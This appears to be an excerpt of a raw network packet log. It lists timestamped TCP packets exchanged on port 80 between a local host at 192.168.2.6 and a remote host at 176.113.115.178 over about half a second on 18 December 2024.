                                                                  Dec 18, 2024 13:49:55.392520905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.392565966 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.393199921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.393420935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.393517017 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.394170046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.394392967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.394443989 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.395178080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.395402908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.395466089 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.396145105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.396373987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.396440983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.397154093 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.397381067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.397448063 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.398098946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.398360014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.398463964 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.399081945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.399271011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.399641037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.400068045 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.400300980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.400372028 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.401040077 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.401267052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.401514053 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.402164936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.402388096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.402467966 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.403014898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.403253078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.403330088 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.403944969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.404185057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.404237032 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.404956102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.405196905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.405261993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.405936003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.406151056 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.406222105 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.406919003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.407145977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.407253027 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.407861948 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.408118963 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.408174992 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.408871889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.409126997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.409209013 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.409846067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.410083055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.410166025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.410825014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.411061049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.411195993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.411896944 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.412180901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.412226915 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.412779093 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.413009882 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.413105965 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.413755894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.414046049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.414096117 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.414729118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.414967060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.415061951 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.415834904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.416099072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.416487932 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.416743040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.416912079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.416976929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.417670965 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.417891979 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.418061018 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.418674946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.418900013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.419003010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.419632912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.419909954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.419977903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.420717001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.420902967 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.420943975 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.421606064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.421813011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.421942949 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.422596931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.422808886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.422875881 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.423732996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.423930883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.424086094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.424633026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.424772978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.424849033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.425556898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.425811052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.425857067 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.426636934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.426776886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.426990986 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.427472115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.427692890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.427771091 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.428471088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.428694010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.428740978 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.429456949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.429864883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.429924965 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.430728912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.431050062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.431310892 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.431644917 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.431802034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.431885004 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.432442904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.432677031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.432785988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.433352947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.433582067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.433662891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.434339046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.434561014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.434603930 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.435256958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.478168011 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.580178976 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.580396891 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.580461025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.580744028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.581166983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.581387043 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.581577063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.582066059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.582462072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.582561016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.582843065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.582890034 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.583592892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.583731890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.583800077 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.584578037 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.584717035 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.584858894 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.585464954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.585696936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.585834980 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.586443901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.586678028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.586723089 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.587594032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.587721109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.587806940 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.588465929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.588686943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.588933945 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.589384079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.589610100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.589699030 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.590348005 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.590579987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.590706110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.591344118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.591553926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.591641903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.592349052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.592607975 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.592744112 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.593310118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.593519926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.593585014 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.594260931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.594510078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.594598055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.595293045 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.595529079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.595639944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.596580982 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.596800089 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.596854925 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.597491026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.597639084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.597788095 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.598234892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.598428965 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.598494053 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.599165916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.599401951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.599576950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.600202084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.600384951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.600553036 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.601125002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.601377964 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.601593971 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.602129936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.602351904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.602404118 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.603178024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.603327036 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.603559971 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.604113102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.604307890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.604362011 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.605062962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.605360985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.605487108 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.606045961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.606256008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.606437922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.607069969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.607301950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.607378006 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.608000040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.608213902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.608329058 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.608980894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.609199047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.609270096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.609958887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.610172987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.610292912 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.610918999 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.611152887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.611452103 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.611907959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.612152100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.612209082 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.612891912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.613121033 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.613184929 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.613886118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.614125013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.614259958 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.614953041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.615202904 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.615330935 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.615835905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.616105080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.616163015 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.616802931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.617034912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.617089033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.617804050 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.618036985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.618155956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.618792057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.618976116 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.619060993 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.619740009 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.619945049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.620070934 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.620863914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.621119022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.621210098 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.621787071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.622113943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.622273922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.622876883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.623056889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.623117924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.623644114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.623869896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.623939037 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.624646902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.624850035 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.624917030 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.625648022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.625870943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.625951052 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.626589060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.626828909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.626882076 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.627558947 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.627777100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.627832890 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.628535986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.628766060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.628824949 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.629544020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.629748106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.629889011 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.630501032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.630740881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.630793095 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.631444931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.681262970 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.772563934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.772756100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.772892952 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.772943974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.773117065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.773202896 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.773549080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.773926973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.774012089 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.774421930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.774918079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.775000095 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.775239944 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.775949955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.776078939 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.776082039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.776880026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.776937008 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.777115107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.777806997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.777879953 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.778027058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.778780937 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.778851032 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.779028893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.779807091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.779874086 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.780019999 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.780844927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.780937910 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.781100988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.781749964 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.781816959 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.781939983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.782684088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.782783031 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:55.782965899 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.783690929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:55.783752918 CET4982280192.168.2.6176.113.115.178
